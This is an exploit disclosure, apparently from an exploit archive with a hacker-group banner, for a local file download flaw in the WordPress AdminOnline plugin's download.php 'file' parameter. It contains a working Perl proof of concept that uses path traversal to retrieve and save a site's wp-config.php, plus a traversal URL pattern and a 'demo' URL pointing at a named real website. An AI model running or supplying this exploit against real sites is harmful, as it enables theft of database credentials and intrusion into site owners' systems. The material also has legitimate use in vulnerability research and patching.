WordPress AdminOnline plugin suffers from a local file disclosure vulnerability.
20c692d7751807177e345335572951873758bd2fa6401da41ae11db57ed96e9b
GGGGGGGGGGGGG HHHHHHHHH HHHHHHHHH BBBBBBBBBBBBBBBBB
GGG::::::::::::G H:::::::H H:::::::H B::::::::::::::::B
GG:::::::::::::::G H:::::::H H:::::::H B::::::BBBBBB:::::B
G:::::GGGGGGGG::::G HH::::::H H::::::HH BB:::::B B:::::B
G:::::G GGGGGG H:::::H H:::::H B::::B B:::::B
G:::::G H:::::H H:::::H B::::B B:::::B
G:::::G H::::::HHHHH::::::H B::::BBBBBB:::::B
G:::::G GGGGGGGGGG H:::::::::::::::::H B:::::::::::::BB
G:::::G G::::::::G H:::::::::::::::::H B::::BBBBBB:::::B
G:::::G GGGGG::::G H::::::HHHHH::::::H B::::B B:::::B
G:::::G G::::G H:::::H H:::::H B::::B B:::::B
G:::::G G::::G H:::::H H:::::H B::::B B:::::B
G:::::GGGGGGGG::::G HH::::::H H::::::HH BB:::::BBBBBB::::::B
GG:::::::::::::::G H:::::::H H:::::::H B:::::::::::::::::B
GGG::::::GGG:::G H:::::::H H:::::::H B::::::::::::::::B
GGGGGG GGGG HHHHHHHHH HHHHHHHHH BBBBBBBBBBBBBBBBB
Grey Hat Boy
[+] Title : Wordpress adminonline Plugin Local File Download
[+] Discovered By : Medrik
[+] CMS Home-Page : http://wordpress.org
[+] Found Date : 2014-06-11
[+] Tested On : Windows
###################################
With this Vulnerability You Can Download Target Local Files .
This is LFD Vulnerability In :
File : Download.php
Parameter : File
########[ Simple Perl Poc ]########
use LWP::Simple;
$target = 'your target here';
$confPath = '/wp-content/plugins/adminonline/product/download.php?file=../../../../wp-config.php';
$req = get $target.$confPath;
if ($req =~ /package WordPress/){
print "\n Downloading Config ...";
open (CONFIG , ">wp-config.txt");
print CONFIG $req;
print "\n $target Config Downloaded To File : Wp-config.txt !\n";
}
########[ End Perl Code ]########
Vulnerability (Locate) :
http://Vulnerable_Host/wp-content/plugins/adminonline/product/download.php?file=[LFD]
Demo :
http://www.cocl.ca/wp-content/plugins/adminonline/product/download.php?file=../../../../wp-config.php
Gr33tz : Beni_Vanda , Black_KinG , M.R.S.CO , Dr.3v1l , 8ThBiT , Enddo ,
Explo!ter , YoSeF__HaCkeR , Moji_RideR , E2MA3N - S!Y0U.T4r.6T - 0x0ptim0us - ARTA And All My Friends .